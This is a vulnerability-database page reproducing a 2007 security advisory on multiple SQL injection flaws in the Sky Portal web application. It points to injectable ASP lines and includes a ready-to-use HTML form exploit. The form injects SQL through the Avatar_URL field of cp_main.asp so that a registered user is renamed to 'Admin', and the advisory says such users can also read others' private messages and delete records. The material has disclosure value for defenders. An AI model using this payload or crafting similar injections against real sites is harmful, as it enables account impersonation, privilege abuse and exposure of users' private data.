Vulners
Lucene search
skyportal vrc6 Multiple Vulnerabilities
########################## WwW.BugReport.ir ###########################################
#
# BugReport Security Research & Penetration Testing Group
#
# Title: [Sky Portal] Multiple SQL Injection Vulnerabilities
# Vendor: http://skyportal.net
# Exploitation: Remote with browser
# Fix Available: Patched In Last Version In Vendor
#######################################################################################
# Leaders : Shahin Ramezany & Sorush Dalili
# Team Members: Alireza Hasani ,Amir Hossein Khonakdar, Hamid Farhadi
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Contact : [email protected]
######################## Bug Description ###########################
Description:
--------------------
A Lot Of Sql Injection Found And We Exploit One Of them
A Registered User Can Change His/Her Name And Read All Other's Private Messages.
Vulnerabilities:
--------------------
+--> Multiple SQL Injection Vulnerabilities
nc_top.asp Line 59
strDBNTFUserName = Mitoone injection bezane be functione line 60 iani isMbr() >>> test.htm but !??! this function is very crazy!
--------------------------
user can delete all bookmarks
inc_bookmarks.asp line 179
delSQL = "DELETE FROM "& strTablePrefix & "BOOKMARKS WHERE BOOKMARK_ID = " & delBkmk(ib)
this file use from cp_main.asp
---------------------------
inc_profile_functions.asp
line 568,570,572,573
---------------------------
user can delete all SUBSCRIPTIONS>
inc_SUBSCRIPTIONS.asp line 163
delSQL = "DELETE FROM "& strTablePrefix & "SUBSCRIPTIONS WHERE SUBSCRIPTION_ID = " & delBkmk(ib)
executeThis(delSQL)
this file use from cp_main.asp
-------------------------- Html Exploit ------------------------------
<form action="http://[VICTIM URL]/cp_main.asp?mode=EditIt&cmd=9" method="post">
Photo_URL: <input type="text" name="Photo_URL" value="" size="200"/>
<br />
Avatar_URL[injection goes here]: <input type="text" name="Avatar_URL" value="',M_Name='Admin',M_Username='Admin" />
<br />
LINK1[Also injection goes here]: <input type="text" name="LINK1" value="" />
<br />
LINK2[Also injection goes here]: <input type="text" name="LINK2" value="" />
<br />
Password: <input type="text" name="Password-d" value="YOU MUST ENTER YOUR HASHED PASSWORD HERE (For Ex: 123123 = defbfbd84d16387273dde914fd309c3b)" />
<br />
Email: <input type="text" name="Email" value="[email protected]" />
<br />
Name: <input type="text" name="Name" value="Your Current Username" />
<br />
RECMAIL: <input type="text" name="RECMAIL" value="0" />
<br />
HideMail: <input type="text" name="HideMail" value="1" />
<br />
<br />
<input type="submit" />
</form>
Credit:
--------------------
BugReport Security Research & Penetration Testing Group
WwW.BugReport.ir
# milw0rm.com [2007-11-20]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1